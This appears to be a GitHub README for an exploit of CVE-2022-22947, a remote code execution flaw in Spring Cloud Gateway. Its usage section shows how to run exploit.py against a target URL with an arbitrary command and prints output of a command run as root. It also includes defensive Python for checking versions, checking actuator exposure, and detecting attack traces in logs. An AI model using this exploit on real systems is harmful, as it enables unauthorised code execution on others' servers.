Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Overview

CVE: CVE-2022-22947
CVSS: 10.0 (VMware - https://tanzu.vmware.com/security/cve-2022-22947)

Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker can send a maliciously crafted request that allows arbitrary remote code execution on the host.
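
A defender-side check for the conditions named above, added here as an example and not part of the original repository: it tests a Spring Cloud Gateway version against the affected ranges and reads a .properties file to see whether the gateway actuator endpoint is enabled and exposed. The property names are the standard Spring Boot actuator settings; the function names and the sample configurations are constructed for illustration.

```python
import re

def is_vulnerable_version(version: str) -> bool:
    """Affected ranges from the title: below 3.0.7, and 3.1.x below 3.1.1."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    v = tuple((parts + [0, 0, 0])[:3])
    return v < (3, 0, 7) or (3, 1, 0) <= v < (3, 1, 1)

def parse_properties(text: str) -> dict:
    """Minimal .properties reader: 'key=value' or 'key: value', '#'/'!' comments."""
    props = {}
    for line in text.splitlines():
        m = re.match(r"\s*([^#!=:\s][^=:\s]*)\s*[=:]\s*(.*?)\s*$", line)
        if m:
            props[m.group(1)] = m.group(2)
    return props

def _csv(value: str) -> set:
    return {item.strip() for item in value.split(",") if item.strip()}

def gateway_actuator_exposed(props: dict) -> bool:
    """True when the gateway actuator endpoint is enabled and exposed over HTTP."""
    enabled = props.get("management.endpoint.gateway.enabled",
                        props.get("management.endpoints.enabled-by-default", "true"))
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if enabled.lower() != "true" or exclude & {"*", "gateway"}:
        return False
    return bool(include & {"*", "gateway"})

def audit(version: str, properties_text: str) -> dict:
    """Combine both checks; 'unsecured' cannot be read from properties alone."""
    props = parse_properties(properties_text)
    result = {"vulnerable_version": is_vulnerable_version(version),
              "actuator_exposed": gateway_actuator_exposed(props)}
    result["needs_action"] = result["vulnerable_version"] and result["actuator_exposed"]
    return result

# Constructed sample configurations (not taken from any real deployment).
WEAK_PROPERTIES = """
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=health,gateway
"""
HARDENED_PROPERTIES = """
# gateway actuator disabled, only health exposed
management.endpoint.gateway.enabled=false
management.endpoints.web.exposure.include=health
"""
```

Whether the endpoint is also unsecured depends on the authentication placed in front of the actuator, which this check does not inspect.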

Usage

git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'

    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)
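
The run above creates a route under /actuator/gateway/routes/ and removes it moments later, which leaves a recognisable pattern in access logs. The following detection logic is an added example, not code from the original repository; it assumes combined-format access logs, the default /actuator base path and the actuator's documented POST and DELETE route operations, and the log lines are constructed.

```python
import re
from datetime import datetime

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumes the default actuator base path (/actuator); adjust if it was remapped.
ROUTE_RE = re.compile(r"^/actuator/gateway/routes/([^/?]+)")

def find_short_lived_routes(log_text: str, window_seconds: int = 300) -> list:
    """Flag routes created and deleted by the same client within the window."""
    created, findings = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, stamp, method, path, status = m.groups()
        route = ROUTE_RE.match(path)
        if not route or not status.startswith("2"):
            continue  # not a successful request against a gateway route
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        key = (client, route.group(1))
        if method == "POST":
            created[key] = when
        elif method == "DELETE" and key in created:
            lifetime = (when - created.pop(key)).total_seconds()
            if 0 <= lifetime <= window_seconds:
                findings.append({"client": client, "route": route.group(1),
                                 "lifetime_seconds": lifetime})
    return findings

# Constructed log lines; client addresses come from documentation ranges.
SAMPLE_LOG = """\
198.51.100.9 - - [01/Mar/2022:09:00:00 +0000] "POST /actuator/gateway/routes/orders HTTP/1.1" 201 0
203.0.113.7 - - [01/Mar/2022:10:15:01 +0000] "POST /actuator/gateway/routes/rtxhovup HTTP/1.1" 201 0
203.0.113.7 - - [01/Mar/2022:10:15:02 +0000] "GET /actuator/gateway/routes/rtxhovup HTTP/1.1" 200 512
203.0.113.7 - - [01/Mar/2022:10:15:03 +0000] "DELETE /actuator/gateway/routes/rtxhovup HTTP/1.1" 200 0
198.51.100.20 - - [01/Mar/2022:10:16:00 +0000] "GET /actuator/health HTTP/1.1" 200 15
198.51.100.9 - - [02/Mar/2022:09:00:00 +0000] "DELETE /actuator/gateway/routes/orders HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for finding in find_short_lived_routes(SAMPLE_LOG):
        print(finding)
```

Any route write arriving through the actuator from an address outside the deployment pipeline is worth reviewing even when no matching delete follows.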

References

https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published

https://tanzu.vmware.com/security/cve-2022-22947

Owner
Crowsec Edtech
Cyber Security Education Company